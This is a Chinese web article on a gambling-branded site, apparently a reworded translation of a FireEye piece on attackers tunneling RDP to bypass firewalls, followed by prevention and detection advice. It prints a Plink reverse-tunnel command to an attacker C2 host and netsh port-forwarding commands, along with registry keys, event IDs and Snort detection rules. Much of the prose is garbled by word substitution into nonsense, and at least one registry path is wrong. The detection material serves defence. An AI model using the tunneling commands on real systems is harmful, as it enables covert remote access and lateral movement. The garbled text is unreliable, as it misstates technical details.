经由过程RDP隧道绕过企业收集限定战略 + 对应的防备与检测手腕 | 申博官网
登录
  • 欢迎进入申博官网!
  • 如果您觉得申博官网对你有帮助,那么赶紧使用Ctrl+D 收藏申博官网并分享出去吧
  • 这里是申博官方网!
  • 申博官网是菲律宾sunbet官网品牌平台!
  • 申博开户专业品牌平台!

经由过程RDP隧道绕过企业收集限定战略 + 对应的防备与检测手腕

申博_新闻事件 申博 184次浏览 已收录 0个评论

媒介

长途桌面效劳(Remote Desktop Services)是Microsoft Windows体系的一个组件(component),它好的一面是,很多公司都运用该效劳以便于:体系治理员(systems administrators)、工程师和长途办公的员工 这些脚色的事情。
另外一方面,长途桌面效劳,特别是长途桌面协定(Remote Desktop Protocol,RDP)在目标体系被黑时期为长途要挟参与者供应了一样的便利性。当经验丰富的要挟参与者竖立了立足点(foothold)并获得了充足的登录凭证(logon credentials)时,他们可以或许会从后门切换到运用直接RDP会话举行长途接见。当歹意软件(即foothold)删除后,入侵变得愈来愈难以检测。

RDP绕过防火墙划定规矩

与非图形后门相比,强迫参与者更喜欢RDP的稳定性和功能性,但RDP的污点可能会在系统中留下遗留问题,因此FireEye发明了在整个系统中使用本地Windows RDP实用程序(utilities)强制参与者。
在历史上,防火墙和NAT规则所钟爱的未公开系统通常被认为不太容易受到入站RDP实验的影响;然而,勒索者越来越多地使用网络隧道和基于主机的端口转发来破坏这些企业级网络主机。

网络隧道和端口转发应用防火墙”小孔(针孔,即从防火墙珍惜一些端口),毕竟,将你的目标网络,服务公众)完成了防火墙服务允许公开采访的,网络中的主机,心爱的人如此之多的防火墙阻止长途服务勃起。
一旦强迫参与者通过防火墙竖立的过程和长途电话服务的凝聚力,凝聚力也许可以用作传输机制,发送流或“隧道”内部防火墙主机本地监控服务,使长途电话服务,迫使参与者在防火墙外可能会见的服务网络,如图1所示

图1 用SSH隧道做网络隧道 传输RDP流量 绕过企业级防火墙
经由过程RDP隧道绕过企业收集限定战略 + 对应的防备与检测手腕

入站RDP通道(Inbound RDP Tunneling)

PuTTY Link是经常被用来”隧道”RDP会话的实用程序,一般称为Plink。
Plink可运用恣意的源端口、目标端口 与其他体系竖立secure shell(SSH)网络衔接。因为很多IT情况要末不实行协定搜检,要末不阻挠从内部网络出站(outbound)的SSH通讯,如FIN8等进击者已在实战中运用Plink建立加密隧道,以许可被沾染的体系上的RDP端口与进击者的C2效劳器举行通讯。

示例
plink.exe <users>@<IP或域名> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

图2 运用Plink建立了胜利的RDP隧道
经由过程RDP隧道绕过企业收集限定战略 + 对应的防备与检测手腕

图3 通讯流量经由过程这个隧道被发送(隧道运用进击者C2效劳器上的端口转发)
communications being sent through the tunnel using port forwarding from the attacker C2 server.
经由过程RDP隧道绕过企业收集限定战略 + 对应的防备与检测手腕

应当注重的是,关于可以或许对某个体系RDP的进击者,他们肯定已有了接见这个体系的其他体式格局,以便建立或接见须要的隧道实用程序(tunneling utility)。
比方,进击者掌握最初始的体系的体式格局多是经由过程鱼叉垂纶邮件投递了payload,竖立了进入企业网络情况的立足点(foothold),同时提取凭证(credentials)以提权。
即”RDP隧道进入被黑情况”这一保持接见的要领,只是进击者在目标情况中保持接见的很多接见要领之一。

跳板机作为跳板(Jump Box Pivoting)

RDP不仅是外部进击者接见被黑体系的圆满对象,RDP会话还可以或许跨多个体系举行链衔接,以便在情况中横向挪动(move laterally)。
FireEye已发明了有要挟参与者经由过程运用本机Windows Network Shell (netsh)敕令做RDP端口转发,以此作为一个接见门路以接见“新发明的”断绝网络(segmented networks),这个断绝网络仅能直接经由过程治理跳板机(administrative jump box)可达。

————————————-

申博网络安全巴士站

申博-网络安全巴士站是一个专注于网络安全、系统安全、互联网安全、信息安全,全新视界的互联网安全新媒体。

————————————-

netsh端口转发敕令:
netsh interface portproxy add v4tov4 listenport = 8001 listenaddress = <JUMP BOX IP> connectport = 3389 connectaddress = <DESTINATION IP>

精简的netsh端口转发敕令:
netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP>

比方,要挟参与者可以或许设置装备摆设这个跳板机(jump box)以在恣意端口上监遵从之前已黑掉的体系(图中Victim System)发出的流量。
然后A的流量将经由过程这个跳板机(jump box)直接转发到断绝网络中的恣意体系的恣意某个指定的端口,包孕默许的RDP端口(TCP 3389).
所述的这类范例的RDP端口转发,为要挟参与者供应了一种应用跳板机(jump box)所许可的网络路由的要领,不会中缀正在运用跳板机(jump box)举行的RDP会话的正当治理员。

图4 RDP横向挪动:经由过程治理跳板机(administrative jump box)到断绝网络
经由过程RDP隧道绕过企业收集限定战略 + 对应的防备与检测手腕

RDP隧道的防备和检测(Prevention and Detection of RDP Tunneling)

进击前提:若是启用了RDP,要挟参与者就可以或许用这类体式格局(经由过程隧道或端口转发)完成横向挪动、权限保持。
防备步伐:为了减轻破绽并检测这些范例的RDP进击,构造应当存眷基于主机和基于网络的防备和检测机制。有关其他信息,请参阅FireEye博客文章,竖立长途桌面协定的基准Establishing a Baseline for Remote Desktop Protocol | FireEye Inc

  • 基于主机的防备

    • 长途桌面效劳(Remote Desktop Service): 在一切不须要运用RDP的终端用户的一般体系和事情站上禁用长途桌面效劳
    • 基于主机的防火墙:启用基于主机的防火墙划定规矩,明白谢绝入站RDP衔接
    • 当地帐户:经由过程启用”Deny log on through Remote Desktop Services” (“谢绝经由过程长途桌面效劳登录”)平安设置,防备在事情站上运用当地帐户运用RDP。
  • 基于主机的检测

    • 注册表项
    • 检察与Plink衔接联系关系的注册表项,这些衔接可被RDP会话隧道滥用以辨认独一的源体系和目标体系。默许情况下,PuTTY和Plink都会在Windows体系上的以下注册表项中存储会话信息和之前衔接的ssh效劳器:
      • HKEY_CURRENT_USER\Software\SimonTatham\PuTTY
      • HKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys
    • 运用以下Windows注册表项存储 用netsh建立的PortProxy设置装备摆设:
      • HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov
    • 网络和检察这些注册表项可以或许辨认正当的SSH和非常的隧道运动。可以或许须要进一步检察以确认每一项的目标。
  • 事宜日记

    • 检察高保真登录事宜(logon events)的事宜日记。一般RDP登录事宜包罗在Windows体系的以下事宜日记中:

      • %systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanager%3Operational.evtx
      • %systemroot%\Windows\System32\winevt\Logs\Security.evtx
    • TerminalServices-LocalSessionManager日记包罗:

      • 1.已胜利的交互式的当地或长途的登录事宜(由EID 21标识)
      • 2.之前某个准确用户竖立的(该用户已注销但RDP会话状况为未停止)的RDP会话的已胜利的从新衔接(由EID 25标识)
      • 3.Security日记包罗胜利的Type 10 长途交互式登录(RDP) (由EID 4624标识)
        • 源ip地点 纪录为 localhost IP地点(127.0.0.1 – 127.255.255.255)的,可以或许透露表现一个隧道式的登录(从正在监听状况的当地主机端口 路由到 当地主机的RDP端口TCP 3389)
    • 搜检plink.exe这个”文件实行”操纵的相关内容。请注重,进击者可以或许重命名文件名以避免检测。相关内容包孕但不限于:
      • 1.应用程序兼容性缓存(Application Compatibility Cache/Shimcache)
      • 2.Amcache
      • 3.跳转列表 (Jump Lists)
      • 4.Prefetch
      • 5.效劳事宜(Service Events)
      • 6.来自WMI存储库的CCM近来运用的应用程序(CCM Recently Used Apps from the WMI repository)
      • 7.注册表项(Registry keys)
  • 基于网络的防备

    • 长途衔接:在衔接须要运用RDP的情况下,强迫从指定的“跳板机”或“集合治理效劳器”启动RDP衔接。
    • 域帐户:对特权帐户(如 域治理员domain administrators)和效劳帐户service accounts运用”Deny log on through Remote Desktop Services”(“谢绝经由过程长途桌面效劳登录”)平安设置。因为这些范例的帐户一般被要挟参与者用于横向挪动到网络情况中的敏感体系。
  • 基于网络的检测
    • 防火墙划定规矩:检察现有防火墙划定规矩以确定能被黑客用来做端口转发的网络地区。除可以或许运用端口转发以外,还应对内网情况中事情站之间的通讯举行监控。一般,事情站之间不须要直接互相通讯(须要时可以或许运用防火墙划定规矩来阻挠任何此范例通讯)
    • 网络流量:实行网络流量的内容搜检。在某个端口上通讯的一切流量并不是都是看起来的模样。比方,要挟参与者可以或许运用TCP端口80或443与长途效劳器竖立RDP隧道,深切搜检这些网络流量可以或许会发明它实际上并不是HTTP或HTTPS,而是完整分歧的流量。因而,公司、构造应亲昵监控本身的网络流量。
    • Snort划定规矩:涌现隧道式RDP的重要目标是 在当RDP握手有一个指定的低的源端口(一般用于另外一协定)。以下供应了两个示例的Snort划定规矩,可以或许资助平安团队辨认网络流量中的RDP隧道(经由过程辨认一般用于其他协定的指定低源端口)

示例 – 用于辨认RDP隧道的Snort划定规矩:

alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize:<65; content:"|03 00 00|"; depth:3; content:"|e0|"; distance:2; within:1; content:"Cookie: mstshash="; distance:5; within:17; sid:1; rev:1;)
alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00|Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;)

总结

RDP使IT环境可能为用户提供舒适和交互的能力。但是,随着越来越多的被胁迫的参与者使用RDP跨其他受限制的接入网段横向移动,平安团队面临着破译和区分合法和恶意RDP流量的挑战。因此,应该采用适当的基于主机和基于网络的准备和检测技术进行主动监视,以识别RDP的潜在恶意应用程序。


申博|网络安全巴士站声明:该文看法仅代表作者自己,与本平台无关。版权所有丨如未注明 , 均为原创丨本网站采用BY-NC-SA协议进行授权
转载请注明经由过程RDP隧道绕过企业收集限定战略 + 对应的防备与检测手腕
喜欢 (0)
[]
分享 (0)
发表我的评论
取消评论
表情 贴图 加粗 删除线 居中 斜体 签到

Hi,您需要填写昵称和邮箱!

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址